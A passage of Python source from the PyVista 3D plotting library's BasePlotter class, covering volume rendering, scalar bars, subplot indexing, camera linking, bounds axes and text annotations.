volume._add_point_array(scalars, title, set_active)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == volume.n_cells:
volume._add_cell_array(scalars, title, set_active)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, volume)
# Set scalar range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
###############
scalars = scalars.astype(float)
idxs0 = scalars < clim[0]
idxs1 = scalars > clim[1]
scalars[idxs0] = np.nan
scalars[idxs1] = np.nan
scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255
# scalars = scalars.astype(np.uint8)
volume[title] = scalars
self.mapper.scalar_range = clim
# Set colormap and build lookup table
table = vtk.vtkLookupTable()
# table.SetNanColor(nan_color) # NaN's are chopped out with current implementation
# above/below colors not supported with volume rendering
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
if cmap is None: # grab alias for cmaps: colormap
cmap = kwargs.get('colormap', None)
if cmap is None: # Set default map if matplotlib is available
try:
import matplotlib
cmap = rcParams['cmap']
except ImportError:
pass
if cmap is not None:
try:
from matplotlib.cm import get_cmap
except ImportError:
raise RuntimeError('Please install matplotlib for volume rendering.')
if cmap is not None:
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
if flip_scalars:
cmap = cmap.reversed()
color_tf = vtk.vtkColorTransferFunction()
for ii in range(n_colors):
color_tf.AddRGBPoint(ii, *cmap(ii)[:-1])
# Set opacities
if isinstance(opacity, (float, int)):
opacity_values = [opacity] * n_colors
elif isinstance(opacity, str):
opacity_values = pyvista.opacity_transfer_function(opacity, n_colors)
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
opacity_values = opacity_transfer_function(opacity, n_colors)
opacity_tf = vtk.vtkPiecewiseFunction()
for ii in range(n_colors):
opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors)
# Now put color tf and opacity tf into a lookup table for the scalar bar
table.SetNumberOfTableValues(n_colors)
lut = cmap(np.array(range(n_colors))) * 255
lut[:,3] = opacity_values
lut = lut.astype(np.uint8)
table.SetTable(VN.numpy_to_vtk(lut))
table.SetRange(*clim)
self.mapper.lookup_table = table
self.mapper.SetInputData(volume)
blending = blending.lower()
if blending in ['additive', 'add', 'sum']:
self.mapper.SetBlendModeToAdditive()
elif blending in ['average', 'avg', 'average_intensity']:
self.mapper.SetBlendModeToAverageIntensity()
elif blending in ['composite', 'comp']:
self.mapper.SetBlendModeToComposite()
elif blending in ['maximum', 'max', 'maximum_intensity']:
self.mapper.SetBlendModeToMaximumIntensity()
elif blending in ['minimum', 'min', 'minimum_intensity']:
self.mapper.SetBlendModeToMinimumIntensity()
else:
raise ValueError('Blending mode \'{}\' invalid. '.format(blending) +
'Please choose one of \'additive\', \'average\', ' +
'\'composite\', \'minimum\' or \'maximum\'.')
self.mapper.Update()
self.volume = vtk.vtkVolume()
self.volume.SetMapper(self.mapper)
prop = vtk.vtkVolumeProperty()
prop.SetColor(color_tf)
prop.SetScalarOpacity(opacity_tf)
prop.SetAmbient(ambient)
self.volume.SetProperty(prop)
actor, prop = self.add_actor(self.volume, reset_camera=reset_camera,
name=name, loc=loc, culling=backface_culling,
pickable=pickable)
# Add scalar bar
if stitle is not None and show_scalar_bar:
self.add_scalar_bar(stitle, **scalar_bar_args)
return actor
def update_scalar_bar_range(self, clim, name=None):
"""Update the value range of the active or named scalar bar.
Parameters
----------
clim : 2 item list
The new range of the scalar bar. Example: ``[-1, 2]``.
name : str, optional
The title of the scalar bar to update
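Examples
--------
A sketch, assuming a scalar bar titled ``'Data'`` already exists in
this plotter:
>>> plotter.update_scalar_bar_range([0.0, 1.0], name='Data') # doctest:+SKIP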
"""
if isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if len(clim) != 2:
raise TypeError('clim argument must be a length 2 iterable of values: (min, max).')
if name is None:
if not hasattr(self, 'mapper'):
raise RuntimeError('This plotter does not have an active mapper.')
self.mapper.scalar_range = clim
return
# Use the name to find the desired actor
def update_mapper(mapper_helper):
mapper_helper.scalar_range = clim
return
try:
for mh in self._scalar_bar_mappers[name]:
update_mapper(mh)
except KeyError:
raise KeyError('Name ({}) not valid/not found in this plotter.'.format(name))
return
@property
def camera_set(self):
""" Returns if the camera of the active renderer has been set """
return self.renderer.camera_set
def get_default_cam_pos(self):
""" Return the default camera position of the active renderer """
return self.renderer.get_default_cam_pos()
@camera_set.setter
def camera_set(self, is_set):
""" Sets if the camera has been set on the active renderer"""
self.renderer.camera_set = is_set
@property
def renderer(self):
""" simply returns the active renderer """
return self.renderers[self._active_renderer_index]
@property
def bounds(self):
""" Returns the bounds of the active renderer """
return self.renderer.bounds
@property
def length(self):
"""Returns the length of the diagonal of the bounding box of the scene
"""
return pyvista.Box(self.bounds).length
@property
def center(self):
""" Returns the center of the active renderer """
return self.renderer.center
def update_bounds_axes(self):
""" Update the bounds of the active renderer """
return self.renderer.update_bounds_axes()
@property
def _scalar_bar_slots(self):
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
self.renderer._scalar_bar_slot_lookup = value
def clear(self):
""" Clears plot by removing all actors and properties """
for renderer in self.renderers:
renderer.RemoveAllViewProps()
self._scalar_bar_slots = set(range(MAX_N_COLOR_BARS))
self._scalar_bar_slot_lookup = {}
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
def remove_actor(self, actor, reset_camera=False):
"""
Removes an actor from the Plotter.
Parameters
----------
actor : vtk.vtkActor
Actor that has previously added to the Renderer.
reset_camera : bool, optional
Resets camera so all actors can be seen.
Returns
-------
success : bool
True when actor removed. False when actor has not been
removed.
"""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
def add_actor(self, uinput, reset_camera=False, name=None, loc=None,
culling=False, pickable=True):
"""
Adds an actor to render window. Creates an actor if input is
a mapper.
Parameters
----------
uinput : vtk.vtkMapper or vtk.vtkActor
vtk mapper or vtk actor to be added.
reset_camera : bool, optional
Resets the camera when true.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
culling : bool, optional
Does not render faces that should not be visible to the
plotter. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Default False.
Returns
-------
actor : vtk.vtkActor
The actor.
actor_properties : vtk.Properties
Actor properties.
"""
# add actor to the correct render window
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_actor(uinput=uinput, reset_camera=reset_camera,
name=name, culling=culling, pickable=pickable)
def loc_to_index(self, loc):
"""
Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
idx : int
Index of the render window.
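Examples
--------
For instance, on a 2x2 grid of renderers the lower-right renderer
sits at flat index 3 (a sketch):
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> int(plotter.loc_to_index((1, 1)))
3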
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.Iterable):
if not len(loc) == 2:
raise AssertionError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
sz = int(self.shape[0] * self.shape[1])
idxs = np.arange(sz, dtype=int).reshape(self.shape)
return idxs[index_row, index_column]
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid
"""
sz = int(self.shape[0] * self.shape[1])
idxs = np.arange(sz, dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.'.format(index))
return args[0]
@property
def camera(self):
""" The active camera of the active renderer """
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene"""
self.renderer.camera = camera
def enable_parallel_projection(self):
"""Set use parallel projection. The camera will have a parallel
projection. Parallel projection is often useful when viewing images or
2D datasets.
"""
return self.renderer.enable_parallel_projection()
def disable_parallel_projection(self):
"""Reset the camera to use perspective projection."""
return self.renderer.disable_parallel_projection()
def add_axes_at_origin(self, x_color=None, y_color=None, z_color=None,
xlabel='X', ylabel='Y', zlabel='Z', line_width=2,
labels_off=False, loc=None):
"""
Add axes actor at the origin of a render window.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. When None, defaults to the
active render window.
Returns
--------
marker_actor : vtk.vtkAxesActor
vtkAxesActor actor
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
return self.renderers[self._active_renderer_index].add_axes_at_origin(**kwargs)
def show_bounds(self, mesh=None, bounds=None, show_xaxis=True,
show_yaxis=True, show_zaxis=True, show_xlabels=True,
show_ylabels=True, show_zlabels=True, italic=False,
bold=True, shadow=False, font_size=None,
font_family=None, color=None,
xlabel='X Axis', ylabel='Y Axis', zlabel='Z Axis',
use_2d=False, grid=None, location='closest', ticks=None,
all_edges=False, corner_factor=0.5, fmt=None,
minor_ticks=False, loc=None, padding=0.0):
"""
Adds bounds axes. Shows the bounds of the most recent input
mesh unless mesh is specified.
Parameters
----------
mesh : vtkPolydata or unstructured grid, optional
Input mesh to draw bounds axes around
bounds : list or tuple, optional
Bounds to override mesh bounds.
[xmin, xmax, ymin, ymax, zmin, zmax]
show_xaxis : bool, optional
Makes x axis visible. Default True.
show_yaxis : bool, optional
Makes y axis visible. Default True.
show_zaxis : bool, optional
Makes z axis visible. Default True.
show_xlabels : bool, optional
Shows x labels. Default True.
show_ylabels : bool, optional
Shows y labels. Default True.
show_zlabels : bool, optional
Shows z labels. Default True.
italic : bool, optional
Italicises axis labels and numbers. Default False.
bold : bool, optional
Bolds axis labels and numbers. Default True.
shadow : bool, optional
Adds a black shadow to the text. Default False.
font_size : float, optional
Sets the size of the label font. Defaults to 16.
font_family : string, optional
Font family. Must be either courier, times, or arial.
color : string or 3 item list, optional
Color of all labels and axis titles. Default white.
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
xlabel : string, optional
Title of the x axis. Default "X Axis"
ylabel : string, optional
Title of the y axis. Default "Y Axis"
zlabel : string, optional
Title of the z axis. Default "Z Axis"
use_2d : bool, optional
A bug with vtk 6.3 on Windows seems to cause this function
to crash; this can be enabled for smoother plotting in
other environments.
grid : bool or str, optional
Add grid lines to the backface (``True``, ``'back'``, or
``'backface'``) or to the frontface (``'front'``,
``'frontface'``) of the axes actor.
location : str, optional
Set how the axes are drawn: either static (``'all'``),
closest triad (``'front'``), furthest triad (``'back'``),
static closest to the origin (``'origin'``), or outer
edges (``'outer'``) in relation to the camera
position. Options include: ``'all', 'front', 'back',
'origin', 'outer'``
ticks : str, optional
Set how the ticks are drawn on the axes grid. Options include:
``'inside', 'outside', 'both'``
all_edges : bool, optional
Adds an unlabeled and unticked box at the boundaries of the
plot. Useful when you want to plot outer grids while
still retaining all edges of the boundary.
corner_factor : float, optional
If ``all_edges``, this is the factor along each axis to
draw the default box. Default is 0.5 to show the full box.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
padding : float, optional
An optional percent padding along each axial direction to cushion
the datasets in the scene from the axes annotations. Defaults to
have no padding.
Returns
-------
cube_axes_actor : vtk.vtkCubeAxesActor
Bounds actor
Examples
--------
>>> import pyvista
>>> from pyvista import examples
>>> mesh = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_bounds(grid='front', location='outer', all_edges=True)
>>> plotter.show() # doctest:+SKIP
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.show_bounds(**kwargs)
def add_bounds_axes(self, *args, **kwargs):
"""Deprecated"""
logging.warning('`add_bounds_axes` is deprecated. Use `show_bounds` or `show_grid`.')
return self.show_bounds(*args, **kwargs)
def add_bounding_box(self, color=None, corner_factor=0.5, line_width=None,
opacity=1.0, render_lines_as_tubes=False, lighting=None,
reset_camera=None, loc=None):
"""
Adds an unlabeled and unticked box at the boundaries of the
plot. Useful when you want to plot outer grids while
still retaining all edges of the boundary.
Parameters
----------
corner_factor : float, optional
This is the factor along each axis to draw the default
box. Default is 0.5 to show the full box.
line_width : float, optional
Thickness of lines.
opacity : float, optional
Opacity of mesh. Should be between 0 and 1. Default 1.0
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
kwargs = locals()
_ = kwargs.pop('self')
_ = kwargs.pop('loc')
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
return renderer.add_bounding_box(**kwargs)
def remove_bounding_box(self, loc=None):
"""
Removes bounding box from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounding_box()
def remove_bounds_axes(self, loc=None):
"""
Removes bounds axes from the active renderer.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``. If None, selects the last
active Renderer.
"""
self._active_renderer_index = self.loc_to_index(loc)
renderer = self.renderers[self._active_renderer_index]
renderer.remove_bounds_axes()
def subplot(self, index_row, index_column):
"""
Sets the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
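Examples
--------
A sketch activating the upper-right subplot of a 2x2 grid:
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(2, 2))
>>> plotter.subplot(0, 1)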
"""
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
self._active_renderer_index = self.loc_to_index((index_row, index_column))
def link_views(self, views=0):
"""
Links the views' cameras.
Parameters
----------
views : int | tuple or list
If ``views`` is int, link the views to the given view
index or if ``views`` is a tuple or a list, link the given
views cameras.
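Examples
--------
A sketch sharing the first renderer's camera across a side-by-side
layout:
>>> import pyvista
>>> plotter = pyvista.Plotter(shape=(1, 2))
>>> plotter.link_views()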
"""
if isinstance(views, int):
for renderer in self.renderers:
renderer.camera = self.renderers[views].camera
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = \
self.renderers[views[0]].camera
else:
raise TypeError('Expected type is int, list or tuple:'
'{} is given'.format(type(views)))
def unlink_views(self, views=None):
"""
Unlinks the views' cameras.
Parameters
----------
views : None | int | tuple or list
If ``views`` is None unlink all the views, if ``views``
is int unlink the selected view's camera or if ``views``
is a tuple or a list, unlink the given views cameras.
"""
if views is None:
for renderer in self.renderers:
renderer.camera = vtk.vtkCamera()
renderer.reset_camera()
elif isinstance(views, int):
self.renderers[views].camera = vtk.vtkCamera()
self.renderers[views].reset_camera()
elif isinstance(views, collections.Iterable):
for view_index in views:
self.renderers[view_index].camera = vtk.vtkCamera()
self.renderers[view_index].reset_camera()
else:
raise TypeError('Expected type is None, int, list or tuple:'
'{} is given'.format(type(views)))
def show_grid(self, **kwargs):
"""
A wrapped implementation of ``show_bounds`` that changes the default
behaviour to use gridlines and show the axes labels on the outer
edges. This is intended to be similar to ``matplotlib``'s ``grid``
function.
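Examples
--------
A sketch, mirroring the ``show_bounds`` example above:
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_hexbeam()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh)
>>> _ = plotter.show_grid()
>>> plotter.show() # doctest:+SKIP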
"""
kwargs.setdefault('grid', 'back')
kwargs.setdefault('location', 'outer')
kwargs.setdefault('ticks', 'both')
return self.show_bounds(**kwargs)
def set_scale(self, xscale=None, yscale=None, zscale=None, reset_camera=True):
"""
Scale all the datasets in the scene of the active renderer.
Scaling is performed independently on the X, Y and Z axes.
A scale of zero is illegal and will be replaced with one.
Parameters
----------
xscale : float, optional
Scaling of the x axis. Must be greater than zero.
yscale : float, optional
Scaling of the y axis. Must be greater than zero.
zscale : float, optional
Scaling of the z axis. Must be greater than zero.
reset_camera : bool, optional
Resets camera so all actors can be seen.
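Examples
--------
A sketch exaggerating the Z axis of the scene by a factor of two:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> plotter.set_scale(zscale=2.0)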
"""
self.renderer.set_scale(xscale, yscale, zscale, reset_camera)
@property
def scale(self):
""" The scaling of the active renderer. """
return self.renderer.scale
def add_scalar_bar(self, title=None, n_labels=5, italic=False,
bold=True, title_font_size=None,
label_font_size=None, color=None,
font_family=None, shadow=False, mapper=None,
width=None, height=None, position_x=None,
position_y=None, vertical=None,
interactive=False, fmt=None, use_opacity=True,
outline=False, nan_annotation=False,
below_label=None, above_label=None,
background_color=None, n_colors=None):
"""
Creates scalar bar using the ranges as set by the last input
mesh.
Parameters
----------
title : string, optional
Title of the scalar bar. Default None
n_labels : int, optional
Number of labels to use for the scalar bar.
italic : bool, optional
Italicises title and bar labels. Default False.
bold : bool, optional
Bolds title and bar labels. Default True
title_font_size : float, optional
Sets the size of the title font. Defaults to None and is sized
automatically.
label_font_size : float, optional
Sets the size of the label font. Defaults to None and is sized
automatically.
color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
font_family : string, optional
Font family. Must be either courier, times, or arial.
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
width : float, optional
The percentage (0 to 1) width of the window for the colorbar
height : float, optional
The percentage (0 to 1) height of the window for the colorbar
position_x : float, optional
The percentage (0 to 1) along the window's horizontal
direction to place the bottom left corner of the colorbar
position_y : float, optional
The percentage (0 to 1) along the window's vertical
direction to place the bottom left corner of the colorbar
interactive : bool, optional
Use a widget to control the size and location of the scalar bar.
use_opacity : bool, optional
Optionally display the opacity mapping on the scalar bar
outline : bool, optional
Optionally outline the scalar bar to make opacity mappings more
obvious.
nan_annotation : bool, optional
Annotate the NaN color
below_label : str, optional
String annotation for values below the scalar range
above_label : str, optional
String annotation for values above the scalar range
background_color : array, optional
The color used for the background in RGB format.
n_colors : int, optional
The maximum number of colors displayed in the scalar bar.
Notes
-----
Setting title_font_size, or label_font_size disables automatic font
sizing for both the title and label.
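Examples
--------
A sketch, adding a bar for the most recently mapped scalars (the
title here is only illustrative):
>>> import pyvista
>>> from pyvista import examples
>>> mesh = examples.load_uniform()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(mesh, show_scalar_bar=False)
>>> plotter.add_scalar_bar('Sample Data')
>>> plotter.show() # doctest:+SKIP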
"""
if font_family is None:
font_family = rcParams['font']['family']
if label_font_size is None:
label_font_size = rcParams['font']['label_size']
if title_font_size is None:
title_font_size = rcParams['font']['title_size']
if color is None:
color = rcParams['font']['color']
if fmt is None:
fmt = rcParams['font']['fmt']
if vertical is None:
if rcParams['colorbar_orientation'].lower() == 'vertical':
vertical = True
# Automatically choose size if not specified
if width is None:
if vertical:
width = rcParams['colorbar_vertical']['width']
else:
width = rcParams['colorbar_horizontal']['width']
if height is None:
if vertical:
height = rcParams['colorbar_vertical']['height']
else:
height = rcParams['colorbar_horizontal']['height']
# check if mapper exists
if mapper is None:
if not hasattr(self, 'mapper') or self.mapper is None:
raise Exception('Mapper does not exist. ' +
'Add a mesh with scalars first.')
mapper = self.mapper
if title:
# Check that this data hasn't already been plotted
if title in list(self._scalar_bar_ranges.keys()):
clim = list(self._scalar_bar_ranges[title])
newrng = mapper.scalar_range
oldmappers = self._scalar_bar_mappers[title]
# get max for range and reset everything
if newrng[0] < clim[0]:
clim[0] = newrng[0]
if newrng[1] > clim[1]:
clim[1] = newrng[1]
for mh in oldmappers:
mh.scalar_range = clim[0], clim[1]
mapper.scalar_range = clim[0], clim[1]
self._scalar_bar_mappers[title].append(mapper)
self._scalar_bar_ranges[title] = clim
# Color bar already present and ready to be used so returning
return
# Automatically choose location if not specified
if position_x is None or position_y is None:
try:
slot = min(self._scalar_bar_slots)
self._scalar_bar_slots.remove(slot)
self._scalar_bar_slot_lookup[title] = slot
except ValueError:
raise RuntimeError('Maximum number of color bars reached.')
if position_x is None:
if vertical:
position_x = rcParams['colorbar_vertical']['position_x']
position_x -= slot * (width + 0.2 * width)
else:
position_x = rcParams['colorbar_horizontal']['position_x']
if position_y is None:
if vertical:
position_y = rcParams['colorbar_vertical']['position_y']
else:
position_y = rcParams['colorbar_horizontal']['position_y']
position_y += slot * height
# Adjust to make sure on the screen
if position_x + width > 1:
position_x -= width
if position_y + height > 1:
position_y -= height
# parse color
color = parse_color(color)
# Create scalar bar
self.scalar_bar = vtk.vtkScalarBarActor()
if background_color is not None:
from ..core.common import vtk_to_numpy, numpy_to_vtk
if not isinstance(background_color, collections.Iterable):
raise TypeError('Expected type for `background_color`'
'is list, tuple or np.ndarray: '
'{} is given'.format(type(background_color)))
if len(background_color) != 3:
raise ValueError('Expected length for `background_color` is 3: '
'{} is given'.format(len(background_color)))
background_color = np.asarray(background_color)
background_color = np.append(background_color, 1.0) * 255.
lut = vtk.vtkLookupTable()
lut.DeepCopy(mapper.lookup_table)
ctable = vtk_to_numpy(lut.GetTable())
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_table = ctable.copy()
use_table[:, -1] = 255.
ctable = (use_table * alphas) + background_color * (1 - alphas)
lut.SetTable(numpy_to_vtk(ctable, array_type=vtk.VTK_UNSIGNED_CHAR))
else:
lut = mapper.lookup_table
self.scalar_bar.SetLookupTable(lut)
if n_colors is not None:
self.scalar_bar.SetMaximumNumberOfColors(n_colors)
if n_labels < 1:
self.scalar_bar.DrawTickLabelsOff()
else:
self.scalar_bar.SetNumberOfLabels(n_labels)
if nan_annotation:
self.scalar_bar.DrawNanAnnotationOn()
if above_label:
self.scalar_bar.DrawAboveRangeSwatchOn()
self.scalar_bar.SetAboveRangeAnnotation(above_label)
if below_label:
self.scalar_bar.DrawBelowRangeSwatchOn()
self.scalar_bar.SetBelowRangeAnnotation(below_label)
# edit the size of the colorbar
self.scalar_bar.SetHeight(height)
self.scalar_bar.SetWidth(width)
self.scalar_bar.SetPosition(position_x, position_y)
if fmt is not None:
self.scalar_bar.SetLabelFormat(fmt)
if vertical:
self.scalar_bar.SetOrientationToVertical()
else:
self.scalar_bar.SetOrientationToHorizontal()
if label_font_size is None or title_font_size is None:
self.scalar_bar.UnconstrainedFontSizeOn()
self.scalar_bar.AnnotationTextScalingOn()
label_text = self.scalar_bar.GetLabelTextProperty()
anno_text = self.scalar_bar.GetAnnotationTextProperty()
label_text.SetColor(color)
anno_text.SetColor(color)
label_text.SetShadow(shadow)
anno_text.SetShadow(shadow)
# Set font
label_text.SetFontFamily(parse_font_family(font_family))
anno_text.SetFontFamily(parse_font_family(font_family))
label_text.SetItalic(italic)
anno_text.SetItalic(italic)
label_text.SetBold(bold)
anno_text.SetBold(bold)
if label_font_size:
label_text.SetFontSize(label_font_size)
anno_text.SetFontSize(label_font_size)
# Set properties
if title:
clim = mapper.scalar_range
self._scalar_bar_ranges[title] = clim
self._scalar_bar_mappers[title] = [mapper]
self.scalar_bar.SetTitle(title)
title_text = self.scalar_bar.GetTitleTextProperty()
title_text.SetJustificationToCentered()
title_text.SetItalic(italic)
title_text.SetBold(bold)
title_text.SetShadow(shadow)
if title_font_size:
title_text.SetFontSize(title_font_size)
# Set font
title_text.SetFontFamily(parse_font_family(font_family))
# set color
title_text.SetColor(color)
self._scalar_bar_actors[title] = self.scalar_bar
if interactive is None:
interactive = rcParams['interactive']
if self.shape != (1, 1):
interactive = False
elif interactive and self.shape != (1, 1):
err_str = 'Interactive scalar bars disabled for multi-renderer plots'
raise Exception(err_str)
if interactive and hasattr(self, 'iren'):
self.scalar_widget = vtk.vtkScalarBarWidget()
self.scalar_widget.SetScalarBarActor(self.scalar_bar)
self.scalar_widget.SetInteractor(self.iren)
self.scalar_widget.SetEnabled(1)
rep = self.scalar_widget.GetRepresentation()
# self.scalar_widget.On()
if vertical is True or vertical is None:
rep.SetOrientation(1) # 0 = Horizontal, 1 = Vertical
else:
rep.SetOrientation(0) # 0 = Horizontal, 1 = Vertical
self._scalar_bar_widgets[title] = self.scalar_widget
if use_opacity:
self.scalar_bar.SetUseOpacity(True)
if outline:
self.scalar_bar.SetDrawFrame(True)
frame_prop = self.scalar_bar.GetFrameProperty()
frame_prop.SetColor(color)
else:
self.scalar_bar.SetDrawFrame(False)
self.add_actor(self.scalar_bar, reset_camera=False, pickable=False)
def update_scalars(self, scalars, mesh=None, render=True):
"""
Updates scalars of an object in the plotter.
Parameters
----------
scalars : np.ndarray
Scalars to replace existing scalars.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
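Examples
--------
A sketch, where ``new_values`` stands in for an array sized to the
mesh's points or cells:
>>> plotter.update_scalars(new_values) # doctest:+SKIP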
"""
if mesh is None:
mesh = self.mesh
if isinstance(mesh, (collections.Iterable, pyvista.MultiBlock)):
# Recursive if need to update scalars on many meshes
for m in mesh:
self.update_scalars(scalars, mesh=m, render=False)
if render:
self.ren_win.Render()
return
if isinstance(scalars, str):
# Grab scalar array if name given
scalars = get_array(mesh, scalars)
if scalars is None:
if render:
self.ren_win.Render()
return
if scalars.shape[0] == mesh.GetNumberOfPoints():
data = mesh.GetPointData()
elif scalars.shape[0] == mesh.GetNumberOfCells():
data = mesh.GetCellData()
else:
raise_not_matching(scalars, mesh)
vtk_scalars = data.GetScalars()
if vtk_scalars is None:
raise Exception('No active scalars')
s = convert_array(vtk_scalars)
s[:] = scalars
data.Modified()
try:
# Why are the points updated here? Not all datasets have points
# and only the scalar array is modified by this function...
mesh.GetPoints().Modified()
except:
pass
if render:
self.ren_win.Render()
def update_coordinates(self, points, mesh=None, render=True):
"""
Updates the points of an object in the plotter.
Parameters
----------
points : np.ndarray
Points to replace existing points.
mesh : vtk.PolyData or vtk.UnstructuredGrid, optional
Object that has already been added to the Plotter. If
None, uses last added mesh.
render : bool, optional
Forces an update to the render window. Default True.
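Examples
--------
A sketch, where ``new_points`` stands in for an (n, 3) array with the
same number of points as the mesh:
>>> plotter.update_coordinates(new_points) # doctest:+SKIP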
"""
if mesh is None:
mesh = self.mesh
mesh.points = points
if render:
self._render()
def close(self):
""" closes render window """
# must close out widgets first
super(BasePlotter, self).close()
if hasattr(self, 'axes_widget'):
del self.axes_widget
if hasattr(self, 'scalar_widget'):
del self.scalar_widget
# reset scalar bar stuff
self.clear()
if hasattr(self, 'ren_win'):
self.ren_win.Finalize()
del self.ren_win
if hasattr(self, '_style'):
del self._style
if hasattr(self, 'iren'):
self.iren.RemoveAllObservers()
self.iren.TerminateApp()
del self.iren
if hasattr(self, 'textActor'):
del self.textActor
# end movie
if hasattr(self, 'mwriter'):
try:
self.mwriter.close()
except BaseException:
pass
def deep_clean(self):
for renderer in self.renderers:
renderer.deep_clean()
# Do not remove the renderers on the clean
self.mesh = None
self.mapper = None
def add_text(self, text, position='upper_left', font_size=18, color=None,
font=None, shadow=False, name=None, loc=None):
"""
Adds text to plot object in the top left corner by default
Parameters
----------
text : str
The text to add to the rendering
position : str, tuple(float)
String name of the position or length 2 tuple of the pixelwise
position to place the bottom left corner of the text box.
If string name is used, returns a `vtkCornerAnnotation` object
normally used for fixed labels (like title or xlabel).
If tuple is used, returns a more general `vtkTextActor`.
Default is to find the top left corner of the rendering window
and place text box up there. Available position: ``'lower_left'``,
``'lower_right'``, ``'upper_left'``, ``'upper_right'``,
``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and
``'left_edge'``
font : string, optional
Font name may be courier, times, or arial
shadow : bool, optional
Adds a black shadow to the text. Defaults to False
name : str, optional
The name for the added actor so that it can be easily updated.
If an actor of this name already exists in the rendering window, it
will be replaced by the new actor.
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Returns
-------
textActor : vtk.vtkTextActor
Text actor added to plot
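Examples
--------
A sketch placing a fixed label in the upper left corner:
>>> import pyvista
>>> plotter = pyvista.Plotter()
>>> actor = plotter.add_text('My Title', position='upper_left')
>>> plotter.show() # doctest:+SKIP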
"""
if font is None:
font = rcParams['font']['family']
if font_size is None:
font_size = rcParams['font']['size']
if color is None:
color = rcParams['font']['color']
if position is None:
# Set the position of the text to the top left corner
window_size = self.window_size
x = (window_size[0] * 0.02) / self.shape[0]
y = (window_size[1] * 0.85) / self.shape[0]
position = [x, y]
corner_mappings = {
'lower_left' : vtk.vtkCornerAnnotation.LowerLeft,
'lower_right' : vtk.vtkCornerAnnotation.LowerRight,
'upper_left' : vtk.vtkCornerAnnotation.UpperLeft,
